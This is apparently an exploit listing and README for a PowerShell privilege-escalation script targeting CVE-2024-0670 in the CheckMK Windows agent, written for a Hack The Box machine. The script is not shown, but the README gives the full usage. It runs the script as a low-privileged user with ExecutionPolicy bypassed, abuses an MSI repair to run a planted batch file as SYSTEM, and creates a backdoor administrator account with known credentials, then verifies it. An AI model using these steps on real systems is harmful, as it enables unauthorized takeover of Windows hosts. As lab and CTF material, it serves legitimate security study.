Exploit for Uncontrolled Search Path Element in Checkmk CVE-2024-0670

Name: Exploit for Uncontrolled Search Path Element in Checkmk CVE-2024-0670
Rating: 5 (11 reviews)
2026-06-24 | CVSS 8.8
## https://sploitus.com/exploit?id=3F58B0E8-968C-5526-9652-3C321B0F8C30
# CVE-2024-0670 - CheckMK Agent MSI Repair Privilege Escalation (NanoCorp HTB)

This repository contains a PowerShell script used to exploit **CVE-2024-0670** on the **NanoCorp** machine from Hack The Box. The vulnerability allows a low-privileged user to abuse the CheckMK Windows Agent MSI repair functionality and execute arbitrary commands with **SYSTEM** privileges.

> **Note:** This exploit was developed for the NanoCorp Hack The Box machine and may require modification before use in other environments.
>
> **Disclaimer:** This repository is provided for educational purposes and authorized security testing only. Use it only on systems you own or have explicit permission to test.

## Usage

### Prerequisites

* [RunasCs.exe](https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.7_x64/RunasCs.exe) (used to execute commands as another user)

### Quick Start

1. Upload [RunasCs.exe](https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.7_x64/RunasCs.exe) — required to run the exploit as the `web_svc` user.

2. Execute the script as the `web_svc` user:

   ```cmd
   .\RunasCs.exe "web_svc" "YourWebSvcPassword" "powershell -ExecutionPolicy Bypass -File C:\ProgramData\CVE-2024-0670-NanoCorp.ps1"
   ```

3. Wait for the MSI repair process to complete. This may take a few minutes.

4. Once finished, the script will output credentials for the newly created local administrator account:

   ```text
   A new User added as administrator with the following credentials: dfdxarjy Password123@
   ```

5. Verify successful privilege escalation:

   ```bash
   nxc smb nanocorp.htb -u "dfdxarjy" -p "Password123@" -k
   ```
   Expected output:

   ```text
   [+] nanocorp.htb\dfdxarjy:Password123@ (Pwn3d!)
   ```

---

## Description

The vulnerability allows a low-privileged user (such as `web_svc`) to escalate privileges to **NT AUTHORITY\SYSTEM** by abusing the Windows Installer repair functionality used by the CheckMK Agent.

The script performs the following actions:

1. Locates the installed CheckMK MSI package on the target system.
2. Writes a batch file to `C:\Windows\Temp` containing commands to create a local user account.
3. Triggers a repair of the MSI package using `msiexec /fa`.
4. The repair process executes the batch file with SYSTEM privileges.
5. The batch file creates a local administrator account by adding the user to the local `Administrators` group.
6. Temporary files are removed after execution.

---

## References

* [CVE-2024-0670](https://nvd.nist.gov/vuln/detail/CVE-2024-0670)
* [CheckMK Windows Agent MSI Repair Privilege Escalation](https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/)